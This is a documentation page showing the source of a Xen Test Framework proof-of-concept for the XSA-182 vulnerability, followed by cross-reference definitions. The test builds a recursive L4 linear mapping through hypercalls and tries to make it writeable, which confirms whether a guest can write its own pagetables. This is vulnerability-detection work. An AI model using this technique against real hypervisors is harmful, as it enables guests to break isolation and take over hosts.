docs/xtf/xsa-182_2main_8c_source.html

#include <xtf.h>


const char test_title[] = "XSA-182 PoC";


void test_main(void)

{

    unsigned long cr3 = read_cr3();

    intpte_t nl1e = pte_from_paddr(cr3, PF_SYM(AD, U, P));

    intpte_t *l4 = _p(KB(4));


    /* Map the L4 at 4K virtual. */

    if ( hypercall_update_va_mapping(_u(l4), nl1e, UVMF_INVLPG) )

        return xtf_error("Error: Update va failed\n");


    unsigned long map_slot = 0, test_slot = 0;

    unsigned int i;


    /* Search for free L4 slots. */

    for ( i = 0; i < L4_PT_ENTRIES; ++i )

    {

        if ( !(l4[i] & PF_SYM(P)) )

        {

            map_slot = i;

            break;

        }

    }

    for ( ; i < L4_PT_ENTRIES; ++i )

    {

        if ( !(l4[i] & PF_SYM(P)) )

        {

            test_slot = i;

            break;

        }

    }


    if ( !map_slot || !test_slot )

        return xtf_error("Insufficient free l4 slots\n");


    mmu_update_t mu = {

        .ptr = cr3 + (map_slot * PTE_SIZE),

        .val = cr3 | PF_SYM(AD, U, P),

    };


    printk("  Creating recursive l4 mapping\n");

    int rc = hypercall_mmu_update(&mu, 1, NULL, DOMID_SELF);

    switch ( rc )

    {

    case 0:

        break;


    case -EINVAL:

        return xtf_skip("Skip: Linear pagetables disallowed\n");


    default:

        return xtf_error("Error: Recursive mapping failed: %d\n", rc);

    }


    printk("  Remapping l4 RW\n");

    mu.val |= _PAGE_RW;

    if ( hypercall_mmu_update(&mu, 1, NULL, DOMID_SELF) )

    {

        printk("  Attempt to create writeable linear map was blocked\n");

        return xtf_success("Not vulnerable to XSA-182\n");

    }


    /*

     * At this point, we are quite certain that Xen is vulnerable.  Poke

     * around some more for extra confirmation.

     */


    /* Construct a pointer to the writeable mapping of the live l4 table. */

    intpte_t *writeable = _p(map_slot << L4_PT_SHIFT |

                             map_slot << L3_PT_SHIFT |

                             map_slot << L2_PT_SHIFT |

                             map_slot << L1_PT_SHIFT);


    writeable[test_slot] = 0xdeadf00d;


    barrier();


    if ( l4[test_slot] == 0xdeadf00d )

    {

        printk("  Successfully constructed writeable pagetables\n");

        xtf_failure("Fail: Vulnerable to XSA-182\n");

    }


    /*

     * Clean up the damage, or Xen will have a reference counting issue when

     * freeing memory.

     */

    writeable[test_slot] = 0;

    barrier();

}


/*

 * Local variables:

 * mode: C

 * c-file-style: "BSD"

 * c-basic-offset: 4

 * tab-width: 4

 * indent-tabs-mode: nil

 * End:

 */

read_cr3
static unsigned long read_cr3(void)
Definition: lib.h:243

barrier
#define barrier()
Definition: compiler.h:30

printk
void printk(const char *fmt,...)
Definition: console.c:134

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110

test_title
const char test_title[]
The title of the test.
Definition: main.c:24

EINVAL
#define EINVAL
Definition: errno.h:33

hypercall_mmu_update
static long hypercall_mmu_update(const mmu_update_t reqs[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:60

hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition: hypercall.h:115

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53

KB
#define KB(num)
Express num in Kilobytes.
Definition: numbers.h:23

L2_PT_SHIFT
#define L2_PT_SHIFT
Definition: page.h:67

PTE_SIZE
#define PTE_SIZE
Definition: page.h:61

intpte_t
unsigned long intpte_t
Definition: page.h:152

_PAGE_RW
#define _PAGE_RW
Definition: page.h:26

L1_PT_SHIFT
#define L1_PT_SHIFT
Definition: page.h:66

pte_from_paddr
intpte_t pte_from_paddr(paddr_t paddr, uint64_t flags)

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

xtf_skip
void xtf_skip(const char *fmt,...)
Report a test skip.
Definition: report.c:66

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

NULL
#define NULL
Definition: stddef.h:12

mmu_update
Definition: xen.h:245

mmu_update::val
uint64_t val
Definition: xen.h:250

mmu_update::ptr
uint64_t ptr
Definition: xen.h:249

PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108

DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70

UVMF_INVLPG
@ UVMF_INVLPG
Definition: xen.h:383